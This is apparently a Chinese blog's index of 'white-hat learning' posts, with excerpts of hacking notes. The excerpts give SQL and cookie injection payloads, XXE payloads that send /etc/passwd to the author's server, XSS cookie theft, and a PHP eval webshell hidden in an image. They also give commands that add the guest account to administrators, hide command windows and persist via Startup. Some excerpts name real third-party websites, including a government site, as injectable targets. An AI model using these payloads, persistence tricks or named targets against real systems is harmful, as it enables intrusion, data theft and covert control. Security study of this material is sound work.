
白帽学习
haodawei123
这个作者很懒,什么都没留下…
展开
-
掌控安全第二关记录
掌控安全第二关记录网址寻找注入点亮点1、使用cookie传参进行注入测试这里的“+”很关键网址第二关网址:http://117.41.229.122:8004/寻找注入点点击其中的一个新闻得到网址http://117.41.229.122:8004/shownews.asp?id=171http://117.41.229.122:8004/shownews.asp?id=171 ord...原创 2019-01-04 20:47:25 · 3318 阅读 · 0 评论 -
XML与DTD文件学习
XMLXML 指扩展标记语言。DTDDTD文档类型定义。说白了DTD就是定义了一个文档的类型内部的 DOCTYPE 声明假如 DTD 被包含在您的 XML 源文件中,它应当通过下面的语法包装在一个 DOCTYPE 声明中:带有 DTD 的 XML 文档实例(请在 IE5 以及更高的版本打开,并选择查看源代码):<?xml version="1.0"?>**<!D...原创 2019-01-13 11:02:10 · 174 阅读 · 0 评论 -
一个好用的搜索引擎
fofa.soheader=“phpmyadmin” 搜索安装phpmyadmin的网址原创 2019-01-13 15:23:45 · 969 阅读 · 0 评论 -
phpcms2008sql注入漏洞利用
https://blog.youkuaiyun.com/whatiwhere/article/details/84666165转载 2019-01-18 16:26:16 · 478 阅读 · 0 评论 -
arp欺骗原理
中间人攻击——ARP欺骗的原理、实战及防御 1.1 什么是网关首先来简单解释一下什么是网关,网关工作在OSI七层模型中的传输层或者应用层,用于高层协议的不同网络之间的连接,简单地说,网关就好比是一个房间通向另一个房间的一扇门。1.2 ARP协议是什么ARP(Address Resolution Protocol)地址转换协议,工作在OSI模型的数据链路层,在以太网中,网络设备之间互相通信...原创 2019-01-14 17:06:30 · 18595 阅读 · 4 评论 -
常用cmd命令
激活guest账号“net user guest /active:yes” #激活guest账号,我喜欢用这个账号net user guest 123 /add 设置guest的密码为123net localgroup administrators guest /add 将guest添加到administrator组查看进程 服务tasklisk -svc查看远程开启的端口net...原创 2019-01-09 14:55:40 · 1042 阅读 · 0 评论 -
webshell绕开防火墙得到3389
https://blog.youkuaiyun.com/wsp1/article/details/281023转载 2019-01-09 14:59:47 · 873 阅读 · 0 评论 -
sql手动注入
第一步:判断环境,寻找注入点确定注入点:用’报错就有注入的希望 and 1=1 正常 and 1=2 报错就基本能注入第二步:猜解表名 检测是否存在admin表,正确存在,返回错误则不存在And exists (select * from admin)第三步:猜解字段Order by字段长度 猜解数据库存在多少数据表如45正确,46错误,则有45个表And 1=2 union s...原创 2019-01-16 23:27:04 · 866 阅读 · 2 评论 -
Access数据库高级偏移注入
注入语句:1、进行偏移检测http://xxx?Id=3 union select 1,2,3,4,5,6,7,8,9,10,11,12, from admin2、* from (admin as a inner join admin as b on a.id=b.id)用这里的替换一下,减少字段的数量只到网页返回正确就可能爆出账号密码3、a.id,b.id,* from (admin a...原创 2019-01-17 01:03:58 · 342 阅读 · 0 评论 -
xxe漏洞学习(2)
payload1内容就是讲下面的内容发送给存在xxe漏洞的web主机,远程web主机就会访问我们的vbs主机中的test.xml文件,并执行。test.xml内容 payload2payload2会访问web服务器上的etc文件夹下面的passwd文件,将访问的结果赋值给payload参数,然后带着payload参数访问我们自己的vps主机的21端口,我们只需在21端口监听接受结果就能查看...原创 2019-01-13 10:14:40 · 291 阅读 · 0 评论 -
xxe漏洞学习(1)
xxe注入-xml External Entity Injection所有的漏洞:利用可控的参数或者入口来加载不可控的参数或者代码,造成恶意不可控的运行结果。xxe可以进行远程文件的读取。note是根元素,to from head body 是子元素xxe漏洞利用xxe间接回显payload1内容见xxe漏洞学习(2)...原创 2019-01-13 10:01:21 · 362 阅读 · 0 评论 -
cmd窗口隐藏
@echo offif “%1”==“h” goto beginstart mshta vbscript:createobject(“wscript.shell”).run(&quot;&quot;&quot;%~nx0&quot;&quot; h&quot;,0)(window.close)&amp;amp;&amp;amp;exit:begin::以下为正常批处原创 2019-01-10 16:20:05 · 9294 阅读 · 0 评论 -
php图片一句话制作
https://blog.youkuaiyun.com/TimeOldman/article/details/78692128新建一个文件夹在其中放入一张图片文件tp.jpg,和yjh.php一句话木马yjh.php中的一句话木马内容为<?php @eval($_POST[yjh]);?>点击bat文件进入DOS命令,写入"copy tp.jpg/b+yjh.php tpyjh.j...转载 2019-01-05 10:18:45 · 2259 阅读 · 0 评论 -
vbs学习记录
https://blog.youkuaiyun.com/hzh_csdn/article/details/79427001原创 2019-01-10 20:37:22 · 317 阅读 · 0 评论 -
掌控安全第四课xss利用
xss漏洞利用原理存在xss漏洞的留言板,提交留言的内容为js代码,xss漏洞会直接执行,可以利用这个漏洞还将登录到留言页面的所有的主机的信息打到一个指定的位置,可以自己架设一个平台或者,打到xss平台,然后利用打到的cookie信息登录到管理页面不用输入管理员账号密码Xss平台可以接受打到的cookie等信息http://xsspt.com/index.php?do=project&...原创 2019-01-05 19:11:27 · 1326 阅读 · 4 评论 -
查看局域网内的其他电脑的ip方法
1、cmd输入 ipconfig 查看自己的ip2、执行下面的for语句“for /L %i IN (1,1,254) DO ping -w 2 -n 1 192.168.0.%i”3、执行 arp -a 命令列出局域网内的主机的ip4、net view 就能看局域网内的电脑的名称for命令说明:FOR /L %variable IN (start,step,end) DO comm...原创 2019-01-11 09:48:04 · 33146 阅读 · 1 评论 -
字符型注入
字符型注入的特点是网站链接末尾不是id=11这样的,而是字符如http://www.xycj.gov.cn/cks/kw.asp?action=gh 注入点 字母http://www.zgcforum.org/forum.asp?title=会议议程 注入点中文测试代码 :‘+and+’1’=‘1 返回正常‘+and+’1’='2 返回错误...原创 2019-01-17 16:42:40 · 1772 阅读 · 0 评论 -
vbs实现cmd窗口进程隐藏运行
1、实现隐藏运行1.vbs的内容如下set r=createobject(“wscript.shell”)r.run “1.bat”,0,true如上面的代码1.bat就会隐藏运行2、添加到自动运行将vbs创建一个快捷方式,将这个快捷方式复制到Startup目录就行了...原创 2019-01-12 11:04:48 · 7134 阅读 · 0 评论 -
cookies注入-突破注入系统
注入站点http://www.xxxdtzx.cn/imagebig_honor.asp?id=458方法1:order by 语句没有禁用 ,用order by 语句测试出访问一下网页,然后在地址栏输入下面的语句测试javascript:alert(document.cookie=“id=”+escape(“7 and 1=2 union select 1,2,3,4,5,6,7 fr...原创 2019-01-18 09:58:07 · 329 阅读 · 0 评论